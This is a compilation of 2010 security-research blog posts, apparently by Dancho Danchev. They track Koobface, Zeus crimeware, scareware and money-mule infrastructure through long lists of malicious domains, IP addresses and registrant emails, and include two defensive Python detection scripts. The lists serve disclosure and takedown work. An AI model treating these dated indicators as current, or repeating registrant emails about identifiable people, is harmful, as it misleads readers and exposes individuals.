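    found = scan(LOG_LINES)
    for alert in found:
        print(alert)
    print("chained:", chained_clients(found))
```

The affid/subid rule is the durable one: hosts and IPs in these campaigns rotate within days, as the February and March lists on this page show, while the affiliate accounting parameters have to survive for the operators to get paid.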

• Consider going through the "[9]10 things you didn't know about the Koobface gang" article 

Recent detection rates for Koobface components: 

- [10]fb.101.exe - Result: 39/42 (92.86 %) 
- [11]go.exe - Result: 7/42 (16.67 %) 
- [12]pp.14.exe - Result: 36/42 (85.72 %) 
- [13]v2bloggerjs.exe - Result: 39/42 (92.86 %) 
- [14]v2captcha21.exe - Result: 24/41 (58.54 %) 
- [15]v2newblogger.exe - Result: 23/41 (56.10 %) 
- [16]v2googlecheck.exe - Result: 36/41 (87.80 %) 
- [17]v2webserver.exe - Result: 26/42 (61.91 %) 

In respect the Koobface gang, as well as cybecrime in 
general, historical OSINT always offers an invaluable 

piece of the malicious puzzle of their campaigns, hosting 
providers, and the campaign structure making it easier to 
establish multiple connections between the rest of their non 
Koobface-botnet related campaigns. 

Here's a peek at the redirectors and scareware domains served during February. For a more extensive assessment of their activities for February, go through the "[18]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang" post.
Redirectors parked at 91.212.132.242, AS49091, Interforum-AS Interforum LTD for February, 2010:

amazing-4-fotos.com - Email: test@now.net.cn
bbcadditionalguide.com - Email: test@now.net.cn
brightonsales.com - Email: test@now.net.cn
daily00photos.com - Email: test@now.net.cn
daily6deals.com - Email: test@now.net.cn
daily88news.com - Email: test@now.net.cn
dellvideohacks.com - Email: test@now.net.cn
discoverallnow.com - Email: test@now.net.cn
discoverprivateinfo.com - Email: test@now.net.cn
discoverprivatelife.com - Email: test@now.net.cn
discoverprivatemail.com - Email: test@now.net.cn
discoverprivatewebcams.com - Email: test@now.net.cn
discoversecretdfacebook.com - Email: test@now.net.cn
facebookfriendwatch.com - Email: test@now.net.cn
facebookreadmail.com - Email: test@now.net.cn
free-amazon-coupon.com - Email: test@now.net.cn
free-ebay-stuff.com - Email: test@now.net.cn
free-secret-info.com - Email: test@now.net.cn
getalestickets.com - Email: test@now.net.cn
hightowerfisheye.com - Email: test@now.net.cn
lenovovideohacks.com - Email: test@now.net.cn
mymailbusiness.com - Email: test@now.net.cn
private-0-photos.com - Email: test@now.net.cn
seehiddenfacebook.com - Email: test@now.net.cn
skyscrapeviews.com - Email: test@now.net.cn
yahoobusinesstrip.com - Email: test@now.net.cn
you22tube.com - Email: test@now.net.cn

Scareware domains parked on 195.5.161.119, AS31252, STARNET-AS StarNet Moldova, for February, 2010:

best-protection0.info - Email: ware2mall@yahoo.com
best-protection8.info - Email: ware2mall@yahoo.com
bestprotectiona.info - Email: ware2mall@yahoo.com
best-protectiona.info - Email: ware2mall@yahoo.com
bestprotectione.info - Email: ware2mall@yahoo.com
best-protectione.info - Email: ware2mall@yahoo.com
best-protectionf.info - Email: ware2mall@yahoo.com
megal-antivirus3.com - Email: test@now.net.cn
megal-antivirus5.com - Email: test@now.net.cn
megal-antivirus7.com - Email: test@now.net.cn
megal-antivirus9.com - Email: test@now.net.cn
megal-scanner5.com - Email: test@now.net.cn
megal-scanner7.com - Email: test@now.net.cn
smartsecurity0.info - Email: neeceheight@yahoo.com
smartsecurity1.info - Email: neeceheight@yahoo.com
smart-security1.info - Email: neeceheight@yahoo.com
smartsecurity2.info - Email: neeceheight@yahoo.com
smartsecurity7.info - Email: neeceheight@yahoo.com
smartsecuritya.info - Email: neeceheight@yahoo.com
smartsecurityd.info - Email: neeceheight@yahoo.com
smart-securityo.info - Email: neeceheight@yahoo.com
super2-antivirus.com - Email: neeceheight@yahoo.com
super2-antivirus2.com - Email: neeceheight@yahoo.com
ver2-scanner.com - Email: test@now.net.cn
ver2-scanner2.com - Email: test@now.net.cn
ver2-scanner4.com - Email: test@now.net.cn

Persistence must be met with persistence. The domain portfolios are in the process of getting suspended; an update will be posted as soon as this happens.

Related Koobface gang/botnet research:

[19] 10 things you didn't know about the Koobface gang

[20] A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang

[21] How the Koobface Gang Monetizes Mac OS X Traffic

[22] The Koobface Gang Wishes the Industry "Happy Holidays"

[23] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline

[24] Koobface Botnet Starts Serving Client-Side Exploits

[25] Massive Scareware Serving Blackhat SEO, the Koobface Gang Style

[26] Koobface Botnet's Scareware Business Model - Part Two

[27] Koobface Botnet's Scareware Business Model - Part One

[28] Koobface Botnet Redirects Facebook's IP Space to my Blog

[29] New Koobface campaign spoofs Adobe's Flash updater

[30] Social engineering tactics of the Koobface botnet

[31] Koobface Botnet Dissected in a TrendMicro Report

[32] Movement on the Koobface Front - Part Two

[33] Movement on the Koobface Front

[34] Koobface - Come Out, Come Out, Wherever You Are

[35] Dissecting Koobface Worm's Twitter Campaign

This post has been reproduced from [36]Dancho Danchev's blog. Follow him [37]on Twitter.

1. http://blogs.zdnet.com/security/?p=4297
2. http://content.zdnet.com/2346-12691_22-342083.html
3. http://www.virustotal.com/analisis/4e62aff9b6612090a088abd1f31817a4582ed9e2ad81cd456f2e536d71fd0ad2-1268411269
4. http://www.virustotal.com/analisis/0bd309172eacda58255cf35e6be6c2a9942056597e12e124d2df2cf27ca7dafd-1268436536
5. http://www.virustotal.com/analisis/4681a237851bfcf0e785d3841a77b9c5f186067dc0218edb96457552046d7a91-1268492213
6. http://www.virustotal.com/analisis/66a853d9ba6add77254eeba4cad01c30d0e9f09778adbb978fdad84d27566f29-1268518041
7. http://www.virustotal.com/analisis/f2bb5d8db53f005fb30f6de99a12a9a8aee9df871b7357a0f1fd72f69abfe666-1268585736
8. http://www.virustotal.com/analisis/2021aeecd166da3d87ec17a403d7df89491dcac9d5b59295325d08fd52470dac-1268597879
9. http://blogs.zdnet.com/security/?p=5452
10. http://www.virustotal.com/analisis/51b56df5ed2c9815b855c220001ff8e118ac0dddf4d47b377cf530156dca2b09-1268437394
11. http://www.virustotal.com/analisis/ef700b4cda22ba9fc12076fdb3cdb3aaa6ed5734ac72a8c9bcd5220916b096f3-1268437400
12. http://www.virustotal.com/analisis/028af4fb82d77ba522799aba7e7d37df015a7ee99c6253a82bd4b5153b0d55a2-1268437402
13. http://www.virustotal.com/analisis/0fe50ee612678361761b226cf8def51c9101ddd80fbbaf567a782df7026bc464-1268437406
14. http://www.virustotal.com/analisis/1123ef7613f92e64c61d0fbeff2e93c1bbdfb7a005cf967628daffc77bd06f5b-1268437471
15. http://www.virustotal.com/analisis/af43db7c6a1cc160fb64659979a274fe205dd6cd2dac832ea4f08dc18d5fc4b5-1268437483
16. http://www.virustotal.com/analisis/187ee3a40da932718df098b1caf4067b0d0ba81288ad5199453396baa735ae70-1268437474
17. http://www.virustotal.com/analisis/1108276c9773c90d617a96603981624160d8948e6992038eca7826f7700dc397-1268437594
18. http://ddanchev.blogspot.com/2010/02/diverse-portfolio-of-scarewareblackhat.html
19. http://blogs.zdnet.com/security/?p=5452
20. http://ddanchev.blogspot.com/2010/02/diverse-portfollio-of-scarewareblackhat.html
21. http://ddanchev.blogspot.com/2010/02/how-koobface-gang-monetizes-mac-os-x.html
22. http://ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.html
23. http://ddanchev.blogspot.com/2009/12/koobface-friendly-riccom-ltd-as29550.html
24. http://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html
25. http://ddanchev.blogspot.com/2009/11/massive-scareware-serving-blackhat-seo.html
26. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html
27. http://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html
28. http://ddanchev.blogspot.com/2009/10/koobface-botnet-redirects-facebooks-ip.html
29. http://blogs.zdnet.com/security/?p=4594
30. http://content.zdnet.com/2346-12691_22-352597.html
31. http://ddanchev.blogspot.com/2009/10/koobface-botnet-dissected-in-trendmicro.html
32. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html
33. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front.html
34. http://ddanchev.blogspot.com/2009/07/koobface-come-out-come-out-wherever-you.html
35. http://ddanchev.blogspot.com/2009/07/dissecting-koobface-worms-twitter.html
36. http://ddanchev.blogspot.com/
37. http://twitter.com/danchodanchev
The Current State of the Crimeware Threat (2010-03-20 17:05)

With [1]Zeus crimeware infections reaching epidemic levels, [2]two-factor authentication under fire, and the actual [3]DIY (do-it-yourself) kit becoming more sophisticated, it's time to reassess the situation by discussing the current and emerging crimeware trends.

What's the current state of the crimeware threat? Just how vibrant is the underground marketplace when it comes to crimeware? What are ISPs doing, and what should ISPs be doing, to solve the problem? Does taking down a cybercrime-friendly ISP have any long-term effects?

I asked [4]Thorsten Holz, researcher at Vienna University of Technology, whose team not only participated in the recent [5]takedown of the Waledac botnet, but [6]released an interesting paper earlier this year, summarizing their findings based on 33GB of crimeware data obtained from active campaigns.

• [7]The current state of the crimeware threat - Q&A

Go through the Q&A.

Related posts on crimeware kits, trends and developments:

[8] Crimeware in the Middle - Zeus

[9] Crimeware in the Middle - Limbo

[10] Crimeware in the Middle - Adrenalin

[11] 76Service - Cybercrime as a Service Going Mainstream

[12] Zeus Crimeware as a Service Going Mainstream

[13] Modified Zeus Crimeware Kit Comes With Built-in MP3 Player

[14] Zeus Crimeware Kit Gets a Carding Layout

[15] The Zeus Crimeware Kit Vulnerable to Remotely Exploitable Flaw

[16] Help! Someone Hijacked my 100k+ Zeus Botnet!

[17] Inside a Zeus Crimeware Developer's To-Do List

Zeus crimeware serving campaigns for Q1, 2010, related to TROYAK-AS:

[18] TROYAK-AS: the cybercrime-friendly ISP that just won't go away

[19] AS50215 Troyak-as Taken Offline, Zeus C&Cs Drop from 249 to 181

[20] Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware

[21] Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams

[22] PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild

[23] Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild

[24] Keeping Money Mule Recruiters on a Short Leash - Part Two[25]

This post has been reproduced from [26]Dancho Danchev's blog. Follow him [27]on Twitter.

1. http://blogs.zdnet.com/security/?p=5365
2. http://blogs.zdnet.com/security/?p=4402
3. http://www.secureworks.com/research/threats/zeus/
4. http://honeyblog.org/
5. http://honeyblog.org/archives/52-Waledac-Takedown-Successful.html
6. http://honeyblog.org/archives/48-Studying-Aspects-of-the-Underground-Economy.html
7. http://blogs.zdnet.com/security/?p=5797
8. http://ddanchev.blogspot.com/2008/04/crimeware-in-middle-zeus.html
9. http://ddanchev.blogspot.com/2009/03/crimeware-in-middle-limbo.html
10. http://ddanchev.blogspot.com/2009/02/crimeware-in-middle-adrenalin.html
11. http://ddanchev.blogspot.com/2008/08/76service-cybercrime-as-service-going.html
12. http://ddanchev.blogspot.com/2008/12/zeus-crimeware-as-service-going.html
13. http://ddanchev.blogspot.com/2008/09/modified-zeus-crimeware-kit-comes-with.html
14. http://ddanchev.blogspot.com/2008/11/zeus-crimeware-kit-gets-carding-layout.html
15. http://ddanchev.blogspot.com/2008/06/zeus-crimeware-kit-vulnerable-to.html
16. http://ddanchev.blogspot.com/2009/02/help-someone-hijacked-my-100k-zeus.html
17. http://ddanchev.blogspot.com/2009/04/inside-zeus-crimeware-developers-to-do.html
18. http://blogs.zdnet.com/security/?p=5761
19. http://ddanchev.blogspot.com/2010/03/as50215-troyak-as-taken-offline-zeus-c.html
20. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html
21. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html
22. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html
23. http://ddanchev.blogspot.com/2010/02/tax-report-themed-zeusclient-side.html
24. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html
25. http://ddanchev.blogspot.com/2010/02/tax-report-themed-zeusclient-side.html
26. http://ddanchev.blogspot.com/
27. http://twitter.com/danchodanchev
Keeping Money Mule Recruiters on a Short Leash - Part Three (2010-03-20 23:14)

[Screenshot: the bogus company's services list - IT Programmers, Customer Servers, Call Centers, Payroll, Software Development, Graphics & document conversions]

UPDATED: 7 minutes after notification, EUROACCESS responded that the IPs mentioned within the AS "have been blackholed for the time being until a confirmation of cleanup has been received from the customer."
augment-group.com - 85.12.46.96
augmentgroup.net - 85.12.46.96
augment-groupmain.tw - 85.12.46.95
amplitude-groupmain.net - 85.12.46.243
asperitygroup.net - 85.12.46.95
asperity-group.com - 85.12.46.95
altitude-groupli.com - 85.12.46.95
celeritygroupmain.tw - 85.12.46.95
celerity-groupmain.net - 85.12.46.96
celerity-groupmain.tw - 85.12.46.95
impact-groupinc.net - 85.12.46.95
impact-groupnet.com - 85.12.46.95
excel-groupsvc.com - 85.12.46.95
fecunda-group.com - 85.12.46.96
fecunda-groupmain.net - 85.12.46.95
fecunda-groupmain.tw - 85.12.46.95
foreaim-group.com - 85.12.46.95
foreaimgroup.net - 85.12.46.96
golden-gateinc.com - 85.12.46.95
golden-gateco.net - 85.12.46.96
luxor-groupco.tw - 85.12.46.96
luxor-groupinc.tw - 85.12.46.96
synapse-groupinc.tw - 85.12.46.95
synapse-groupfine.net - 85.12.46.96
synapsegroupli.com - 85.12.46.96
spark-groupsvc.com - 85.12.46.96
tnmgroupsvc.net - 85.12.46.96
tnmgroupinc.com - 85.12.46.95
westendgroupsvc.net - 85.12.46.96

It's a fact. However, in less than a minute the money mule recruitment gang moved the domains from the now blackholed 85.12.46.241, 85.12.46.242, 85.12.46.243, 85.12.46.244 and 85.12.46.245 to 85.12.46.95 and 85.12.46.96.

These, including the crimeware and the scareware IPs, are now also blackholed. Let's see what the gang will do next.

The cybercriminals you know are better than the cybercriminals you don't know. They can be typosquatting, or changing their hosting providers, but they can't escape.
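One way to turn the observation above into a check a defender can run after a blackhole request, as an added example (not code from the post): compare two resolution snapshots and flag domains that merely hopped to a neighbouring address inside the same /24 rather than leaving the network, so the follow-up request to the AS can name the new addresses directly. Both snapshots are constructed from the addresses named in this post; `constructed-example.invalid` is a made-up domain included only to exercise the "moved elsewhere" branch, and `same_prefix`, `rehosting_report` and `followup_blackhole_candidates` are this example's own names.

```python
"""Flag domains that hop to a neighbouring address after their IP is blackholed.

Added example, not code from the original post. Both snapshots are
constructed from the addresses named in the post; constructed-example.invalid
is a made-up domain that only exercises the "moved elsewhere" branch.
same_prefix, rehosting_report and followup_blackhole_candidates are this
example's own names.
"""
import ipaddress
from typing import Dict, List, Set, Tuple

Move = Tuple[str, str, str]  # (domain, old_ip, new_ip)

# Constructed snapshot: resolutions before EUROACCESS blackholed .241-.245.
BEFORE: Dict[str, str] = {
    "augment-group.com": "85.12.46.245",
    "augmentgroup.net": "85.12.46.245",
    "asperitygroup.net": "85.12.46.241",
    "celerity-groupmain.net": "85.12.46.243",
    "impact-groupinc.net": "85.12.46.242",
    "westendgroupsvc.net": "85.12.46.241",
    "amplitude-groupmain.net": "85.12.46.245",
    "greatuk.org": "193.104.22.100",
    "constructed-example.invalid": "85.12.46.244",
}
# Constructed snapshot: resolutions less than a minute after the blackhole.
AFTER: Dict[str, str] = {
    "augment-group.com": "85.12.46.96",
    "augmentgroup.net": "85.12.46.96",
    "asperitygroup.net": "85.12.46.95",
    "celerity-groupmain.net": "85.12.46.96",
    "impact-groupinc.net": "85.12.46.95",
    "westendgroupsvc.net": "85.12.46.96",
    "amplitude-groupmain.net": "85.12.46.243",
    "greatuk.org": "193.104.22.100",
    "constructed-example.invalid": "193.104.22.50",
}
BLACKHOLED: Set[str] = {f"85.12.46.{n}" for n in range(241, 246)}


def same_prefix(a: str, b: str, prefixlen: int = 24) -> bool:
    """True when both addresses fall inside the same /prefixlen network."""
    net = ipaddress.ip_network(f"{a}/{prefixlen}", strict=False)
    return ipaddress.ip_address(b) in net


def rehosting_report(before, after, blackholed, prefixlen=24):
    """Classify every domain present in both snapshots.

    Returns (hopped, moved, unchanged, stale):
      hopped    - left a blackholed IP for a neighbour in the same /prefixlen
      moved     - left for an address outside that netblock
      unchanged - same, non-blackholed address in both snapshots
      stale     - still answers from a blackholed address
    """
    hopped: List[Move] = []
    moved: List[Move] = []
    unchanged: List[str] = []
    stale: List[str] = []
    for domain, old_ip in before.items():
        new_ip = after.get(domain)
        if new_ip is None:
            continue  # dropped from resolution; nothing to compare
        if new_ip in blackholed:
            stale.append(domain)
        elif new_ip == old_ip:
            unchanged.append(domain)
        elif old_ip in blackholed and same_prefix(old_ip, new_ip, prefixlen):
            hopped.append((domain, old_ip, new_ip))
        else:
            moved.append((domain, old_ip, new_ip))
    return hopped, moved, unchanged, stale


def followup_blackhole_candidates(hopped: List[Move]) -> List[str]:
    """Distinct landing addresses of within-block hops: the next list for the AS."""
    return sorted({new_ip for _, _, new_ip in hopped})


if __name__ == "__main__":
    hopped, moved, unchanged, stale = rehosting_report(BEFORE, AFTER, BLACKHOLED)
    for domain, old, new in hopped:
        print(f"hop inside /24: {domain} {old} -> {new}")
    for domain, old, new in moved:
        print(f"moved out of block: {domain} {old} -> {new}")
    print("still on a blackholed IP:", stale)
    print("ask the AS to blackhole next:", followup_blackhole_candidates(hopped))
```

The /24 test is deliberately coarse: a hop inside the same netblock means the same customer allocation is still in use, which is the signal that the blackhole should be widened rather than repeated address by address.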



The money mule recruiters profiled in "[1]Keeping Money Mule Recruiters on a Short Leash" and in "[2]Keeping Money Mule Recruiters on a Short Leash - Part Two" are now switching hosting to AS34305, EUROACCESS Global Autonomous System - the [3]Koobface gang was also using their services during the Christmas season.

The gang appears to have also purchased new templates using new, but naturally bogus, descriptions of the money mule recruitment companies. It gets even more interesting when one of the domains ([4]greatuk.org) participating in a Zeus crimeware campaign within AS34305 turns out to be registered to hilarykneber@yahoo.com ([5]The Kneber botnet - FAQ).

An excerpt from [6]The Kneber botnet - FAQ on the Koobface gang connection:

• The name servers used in [7]December, 2009's DocStoc scareware campaign were registered using the same email used to register the [8]client-side exploit serving domains that were part of the Koobface gang's experiment conducted in November, 2009. Parked on the same IP hosting the domain which was serving the malware in the campaign was also a domain registered to HilaryKneber@yahoo.com (search-results.cn). Even more interesting is the fact that the emails used to register the rest of the domains parked at this IP are also known to have been used in registering money mule recruitment domains ([9]Standardizing the Money Mule Recruitment Process; [10]Keeping Money Mule Recruiters on a Short Leash)

The bogus money mule recruitment companies are using identical templates, describing themselves as follows:

"Welcome to the world of Outsourcing. Never has a phenomenon been so all encompassing and empowering like outsourcing. Transcending beyond an industry's vertical segments, outsourcing has become the "by default" strategy for all profit conscious organizations that struggle to retain their winning streak and high profitability. Today's scenario in the business world is more competitive than what it was in the past.

There is a growing realization that wisdom lies in consolidating the core competency functions and outsourcing the supplement. We are an online services marketplace in USA and Australia. Our goal is to empower businesses with the absolute freedom to choose where to outsource their business needs to maximize their competitive advantage.

We believe that "money saved due to outsourcing can be effectively and successfully utilized to focus more on strategic and core businesses functions"."

Let's expose the domain portfolio, its supporting name servers, and emphasize the scareware and crimeware activity currently taking place at AS34305, EUROACCESS Global Autonomous System.
Active money mule recruitment domains:

augment-group.com - 85.12.46.245 - Email: mylar@5mx.ru
augmentgroup.net - 85.12.46.245 - Email: glean@fastermail.ru
augment-groupmain.tw - 85.12.46.245 - Email: gutsy@qx8.ru
amplitude-groupmain.net - 85.12.46.245 - Email: tabs@5mx.ru
asperitygroup.net - 85.12.46.241 - Email: cde@freenetbox.ru
asperity-group.com - 85.12.46.244 - Email: okay@qx8.ru
alwyn-groupllc.com - Email: cde@freenetbox.ru
altitude-groupli.com - 85.12.46.244 - Email: mylar@5mx.ru
celeritygroupmain.tw - 85.12.46.242 - Email: gutsy@qx8.ru
celerity-groupmain.net - 85.12.46.243 - Email: cde@freenetbox.ru
celerity-groupmain.tw - 85.12.46.241 - Email: weds@fastermail.ru
impact-groupinc.net - 85.12.46.242 - Email: cde@freenetbox.ru
impact-groupnet.com - 85.12.46.243 - Email: okay@qx8.ru
excel-groupsvc.com - 85.12.46.241 - Email: carlo@qx8.ru
[Screenshot: Augment Group template - "How site works?": 1. Post and track your vacancies, RFPs and projects; 2. Find affordable freelancers or full-time staff; 3. Get work done below budget and make profit; "About the Company"]
fecunda-group.com - 85.12.46.241 - Email: okay@qx8.ru
fecunda-groupmain.net - 85.12.46.243 - Email: mylar@5mx.ru
fecunda-groupmain.tw - 85.12.46.245 - Email: ti@fastermail.ru
foreaim-group.com - 85.12.46.245 - Email: cde@freenetbox.ru
foreaimgroup.net - 85.12.46.241 - Email: glean@fastermail.ru
golden-gateinc.com - 85.12.46.242 - Email: cde@freenetbox.ru
golden-gateco.net - 85.12.46.242 - Email: carlo@qx8.ru
luxor-groupco.tw - 85.12.46.244 - Email: logic@qx8.ru
luxor-groupinc.tw - 85.12.46.244 - Email: gv@fastermail.ru
synapse-groupinc.tw - 85.12.46.241 - Email: omega@fastermail.ru
synapse-groupfine.net - 85.12.46.245 - Email: okay@qx8.ru
synapsegroupli.com - 85.12.46.243 - Email: tabs@5mx.ru
spark-groupsvc.com - Email: trim@freenetbox.ru
tnmgroupsvc.net - 85.12.46.245 - Email: tabs@5mx.ru
tnmgroupinc.com - 85.12.46.241 - Email: tabs@5mx.ru
westendgroupsvc.net - 85.12.46.241 - Email: mylar@5mx.ru
[Screenshot: Impact Group Inc site built on the same template - "How site works?" (1. Post and track your vacancies, RFPs and projects; 3. Get work done below budget and make profit), "What We Do", "Services Overview", "About us", "About the Company" carrying the outsourcing description quoted above, "Latest projects", "Our service"]

Name servers:

ns1.maninwhite.ee - 89.248.166.45 - Email: duly@fastermail.ru
ns1.trythisok.cn - 89.248.166.45 - Email: chunk@qx8.ru
ns1.translatasheep.net - 92.63.111.127 - Email: stair@freenetbox.ru
ns1.alwaysexit.com - 92.63.111.146 - Email: sob@bigmailbox.ru
ns1.ehinegrowth.ee - 89.248.166.59 - Email: duly@fastermail.ru
ns2.cnnandpizza.cc - 205.234.195.188 - Email: bears@fastermail.ru
ns1.benjenkinss.cn - 89.248.166.59 - Email: chunk@qx8.ru
ns1.worldslava.ee - 64.85.174.145 - Email: fussy@bigmailbox.ru
ns2.uleaveit.com - 204.12.217.253 - Email: plea@qx8.ru
ns3.pesenlife.net - 74.118.194.86 - Email: erupt@qx8.ru
ns1.basilkey.ws - 98.158.171.87

Next to the money mule recruitment domains, there are several [11]active Zeus crimeware campaigns using the following domains/IPs. In fact, one of them is using a domain registered to Hilary Kneber ([12]The Kneber botnet - FAQ):

[13] greatuk.org - 193.104.22.100 - Email: hilarykneber@yahoo.com
[14] greatan.cn - 193.104.22.100 - Email: AlehnoLopu_@yahoo.com
[15] 193.104.22.71
[16] 193.104.22.90
What are we missing? Naturally, that's the scareware monetization element. Let's expose one of the currently active scareware domain portfolios there.

Domains responding to 193.104.22.50 - AS34305, EUROACCESS Global Autonomous System:

2009antispyware.net - Email: admin@web-antispyware.com
againstspyware.com - Email: admin@antiviruscenter.net
antispycenterprof.com - Email: admin@antispycenterprof.com
anti-spyware-2010.net - Email: admin@antiviruscenter.net
antispyware24x7.com - Email: admin@antispyware24x7.com
antispywareglobal.com - Email: admin@antiviruscenter.net
antispywareonline.net - Email: admin@antiviruscenter.net
antispywaresnet.com - Email: admin@antispywaresnet.com
antispywarets.com - Email: admin@antispywarets.com
antispywareweb.net - Email: admin@antiviruscenter.net
antispyworldwideint.com - Email: admin@antispyworldwideint.com
antiviruscenter.net - Email: admin@antiviruscenter.net
antivirusexpert.net - Email: admin@antiviruscenter.net
antivirus-live.net - Email: admin@antiviruscenter.net
antiviruslivepro.com - Email: admin@antiviruscenter.net
antiviruslive-pro.com - Email: admin@antiviruscenter.net
antivirus-service.net - Email: admin@antiviruscenter.net
antivirustop.net - Email: admin@antiviruscenter.net
bestantispysoft2010.com - Email: admin@bestantispysoft2010.com
eliminater2009pro.com - Email: admin@eliminater2009pro.com
itsafetyonline.com - Email: admin@itsafetyonline.com
ivirusidentify.com - Email: admin@ivirusidentify.com
myprivatesoft2009.com - Email: admin@myprivatesoft2009.com
netantivirus.net - Email: admin@antiviruscenter.net
onlineantispysoft.com - Email: admin@onlineantispysoft.com
pcdoctorz2010.com - Email: admin@pcdoctorz2010.com
pcprotect2010.com - Email: admin@pcprotect2010.com
pcsafety2009pro.com - Email: admin@pcsafety2009pro.com
protection2010.com - Email: admin@pcsafety2009pro.com
protectorservice.com - Email: admin@antiviruscenter.net
superantivirus.net - Email: admin@antiviruscenter.net
systemprotector.net - Email: admin@antiviruscenter.net
total-defender.com - Email: admin@total-defender.com
virusdetect24.com - Email: admin@antiviruscenter.net
virusremoveonline.com - Email: admin@antiviruscenter.net
worldantispywarel.com - Email: admin@worldantispywarel.com
worldprotection.net - Email: admin@antiviruscenter.net

EUROACCESS has been notified; the post will be updated once/if they take care of the "customers" violating their Terms of Service.



Related coverage of money laundering in the context of cybercrime:

[17] Money Mule Recruiters on Yahoo!'s Web Hosting

[18] Dissecting an Ongoing Money Mule Recruitment Campaign

[19] Keeping Money Mule Recruiters on a Short Leash - Part Two

[20] Keeping Reshipping Mule Recruiters on a Short Leash

[21] Keeping Money Mule Recruiters on a Short Leash

[22] Standardizing the Money Mule Recruitment Process

[23] Inside a Money Laundering Group's Spamming Operations

[24] Money Mule Recruiters use ASProx's Fast Fluxing Services

[25] Money Mules Syndicate Actively Recruiting Since 2002

This post has been reproduced from [26]Dancho Danchev's blog. Follow him [27]on Twitter.

1. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html
2. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html
3. http://ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.html
4. https://zeustracker.abuse.ch/monitor.php?host=greatuk.org
5. http://blogs.zdnet.com/security/?p=5508
6. http://blogs.zdnet.com/security/?p=5508
7. http://ddanchev.blogspot.com/2009/12/celebrity-themed-scareware-campaign_07.html
8. http://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html
9. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html
10. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html
11. https://zeustracker.abuse.ch/monitor.php?as=34305
12. http://blogs.zdnet.com/security/?p=5508
13. https://zeustracker.abuse.ch/monitor.php?host=greatuk.org
14. https://zeustracker.abuse.ch/monitor.php?host=greatan.cn
15. https://zeustracker.abuse.ch/monitor.php?host=193.104.22.71
16. https://zeustracker.abuse.ch/monitor.php?host=193.104.22.90
17. http://ddanchev.blogspot.com/2010/03/money-mule-recruiters-on-yahoos-web.html
18. http://ddanchev.blogspot.com/2010/02/dissecting-ongoing-money-mule.html
19. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html
20. http://ddanchev.blogspot.com/2009/12/keeping-reshipping-mule-recruiters-on.html
21. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html
22. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html
23. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html
24. http://ddanchev.blogspot.com/2008/07/money-mule-recruiters-use-asproxs-fast.html
25. http://ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.html
26. http://ddanchev.blogspot.com/
27. http://twitter.com/danchodanchev
GazTransitStroy/GazTranZitStroy: From Scareware to Zeus Crimeware and Client-Side Exploits (2010-03-24 00:22)

Remember 2009's GazTransitStroy/GazTranZitStroy LLC, [1]AS29371? The fake Russian gas company whose motto was "In gaz we trust"? It appears that in order to stay competitive within the cybercrime ecosystem, they are now diversifying their offerings from hosting scareware domains and redirectors to [2]active Zeus crimeware campaigns, next to the client-side exploit serving campaigns used as the infection vector.

• Go through previous posts detailing their activities: [3]GazTranzitStroyInfo - a Fake Russian Gas Company Facilitating Cybercrime; [4]GazTransitStroy/GazTranZitStroy Rubbing Shoulders with Petersburg Internet Network LLC
From last week's active Zeus C&Cs:

houstonhotelreal.com - 91.212.41.88 - Email: admin@houstonhotelreal.com
doctormiler.com - 91.212.41.14 - Email: cheburaskogro@yahoo.com
pipiskin.hk - 91.212.41.40 - Email: admin@pipiskin.hk
lopokerasandco.hk - 91.212.41.89 - Email: admin@lopokerasandco.hk
aervrfhu.ru - 91.212.41.88/109.196.143.60 - Email: samm_87@email.com
updateinfo22.com - 91.212.41.60/193.148.47.60 - Email: moonbeam@konocti.net
tumasolt.com - 91.212.41.123 - Email: stuns@5mx.ru
91.212.41.80
91.212.41.79
91.212.41.78

To this week's active Zeus campaigns:

cpadm21.cn - 91.212.41.31 - Email: Dalas_Illarionov@yahooo.com
doctormiler.com - 91.212.41.14 - Email: cheburaskogro@yahoo.com
91.212.41.80
91.212.41.79
91.212.41.78
GazTransitStroy is still in operation, acting as a route for malicious activity, in the very same way it was interacting with other cybercrime-friendly ASs (EUROHOST-NET/Eurohost LLC) during 2009. Let's take a quick snapshot of the malicious activity currently taking place at AS29371.

Detection rate for the Zeus crimeware phoning back to GazTransitStroy/GazTranZitStroy:

- [5]Trojan.Zbot - Result: 8/41 (19.52 %)

- [6]TROJ_KRARSMDA - Result: 5/42 (11.91 %)

- [7]Packed.Win32.Krap.ae - Result: 10/42 (23.81 %)

Client-side exploits serving domains/admin panels parked at 91.212.41.87 (served payload: [8]Spammer:Win32/Tedroo.AB; Win32:FakeAlert-JJ - Result: 31/42 (73.81 %)):

hvcvjxcc.cn - Email: wang9619@163.com
fyyxqftc.cn - Email: wang9619@163.com
qymgeejd.cn - Email: wang9619@163.com
gjjdrgqf.cn - Email: wang9619@163.com
gdttjkug.cn - Email: wang9619@163.com
